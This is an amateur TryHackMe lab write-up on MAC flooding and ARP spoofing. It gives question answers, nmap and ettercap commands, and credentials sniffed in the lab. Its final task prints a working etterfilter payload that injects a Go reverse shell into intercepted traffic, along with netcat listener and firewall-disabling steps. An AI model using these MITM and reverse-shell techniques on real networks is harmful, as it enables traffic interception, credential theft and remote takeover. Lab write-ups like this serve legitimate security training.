Tryhackme L2 MAC Flooding & ARP Spoofing writeup
TASK 2
Note The admin user is in the sudo group. I suggest using the root user to complete this room
sudo su (password : Layer2)
Q.1 Now, can you (re)gain access?(Yay/Nay).
Ans. Yea
TASK 3
Q. 1 What is your IP address?
ip address show eth1
Ans. 192.168.12.66
Q. 2 What's the network's CIDR prefix?
Ans. /24
Q. 4 How many other live hosts are there?
nmap -sn 192.168.12.66/24
Ans. 2
Q. 5 What's the hostname of the first host (lowest IP address) you've found?
Ans. alice
TASK 4
Q. 1 Can you see any traffic from those hosts? (Yay/Nay)
Ans. yea
Q. 2 Who keeps sending packets to eve?
Ans. bob
Q. 3 What type of packets are sent?
Ans. icmp
hint for Q 3 & 4 see fig
Q. 4 What's the size of their data section? (bytes)
Ans. 666
TASK 5
Q. 1 What kind of packets is Alice continuously sending to Bob?
Ans. icmp
Q. 2 What's the size of their data section? (bytes)
Ans. 1337 (same as Q 3 & 4 in task 4)
Task 6
Q.1 Can ettercap establish a MITM in between Alice and Bob? (Yay/Nay)
Ans. nay
Q. 2 Would you expect a different result when attacking hosts without ARP packet validation enabled? (Yay/Na
Ans. yay
TASk 7
Note : Use root user
sudo su (password : Layer2)
Q. 1 Scan the network on eth1. Who's there? Enter their IP addresses in ascending order.
nmap 192.168.12.0/24
Ans. 192.168.12.10, 192.168.12.20
Q. 2 Which machine has an open well-known port?
Ans. 192.168.12.20
Q. 3 What is the port number?
Ans. 80
Q. 4 Can you access the content behind the service from your current position? (Nay/Yay)
Ans. Nay
Q. 5 Can you see any meaningful traffic to or from that port passively sniffing on you interface eth1? (Nay/Yay)
Ans. Nay
Q. 6 Now launch the same ARP spoofing attack as in the previous task. Can you see some interesting traffic, now? (Nay/Yay)
Ans. Yay
To launch arp attack ettercap -T -i eth1 -M arp
ettercap -T -i eth1 -M arp > myarp.txt (read carefully Q 7,89,11,17 Ans found in myarp.txt)
Q. 7 Who is using that service?
Ans. alice
Q. 8 What's the hostname the requests are sent to?
Ans www.server.bob
Q. 9 Which file is being requested?
Ans. test.txt
Q. 10 What text is in the file?
curl -u admin:s3cr3t_p4zz http://192.168.12.20/test.txt
Ans ok
Q. 11 Which credentials are being used for authentication? (username:password)
Ans. admin:s3cr3t_P4zz
Q. 12 Now, stop the attack (by pressing q). What is ettercap doing in order to leave its man-in-the-middle position gracefully and undo the poisoning?
Ans. RE-ARPing the victims
Q. 13 Can you access the content behind that service, now, using the obtained credentials? (Nay/Yay)
Ans. Yay
Q. 14 What is the user.txt flag?
curl -u admin:s3cr3t_p4zz http://192.168.12.20/user.txt
Ans. THM{..........}
Q. 15 You should also have seen some rather questionable kind of traffic. What kind of remote access (shell) does Alice have on the server?
Ans. reverse shell
Q. 16 What commands are being executed? Answer in the order they are being executed.
Ans. whoami, pwd, ls
Q.17 Which of the listed files do you want?
Ans. root.txt
TASK 8
Q. 1 What is the root.txt flag?
Ans. THM{........}
Read carefully each and every line in Task 8 module L2 MAC Flooding & ARP Spoofing on tryhackme
Follow steps to find root flag
hint: follow these steps on ssh machine not on your local machine
step 1. copy and save in a whoami.ecf file
note: if this payload not work download whoami.ecf file from repo Download
if (ip.proto == TCP && tcp.src == 4444 && search(DATA.data, "whoami") ) {
log(DATA.data, "/root/ettercap.log");
replace("whoami", "echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.12.66:6666");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go &" );
msg("###### ETTERFILTER: substituted 'whoami' with reverse shell. ######\n");
}
step 2. compile source code with etterfilter
etterfilter whoami.ecf -o whoami.ef
step 3. Disable firewall
sudo ufw disable (password: Layer2)
step 4. open one another ssh session and start netcat listener
hint: use same port in source code and netcat listener
nc -nvlp 6666 &
step 5. Run ettercap
sudo ettercap -T -i eth1 -M arp -F whoami.ef
A few seconds after executing this command, you should see "Connection received on 192.168.12.20 " on netcat listerer
step 6. on netcat listener type "fg" to foreground listener
Enjoy revershell
Thank you
this is my first writeup, if i made any mistake foregive me.
if you have any questions connect with me on LinkedIn.(use tryhackme to get my LinkedIn Id).
Ajeet Kumar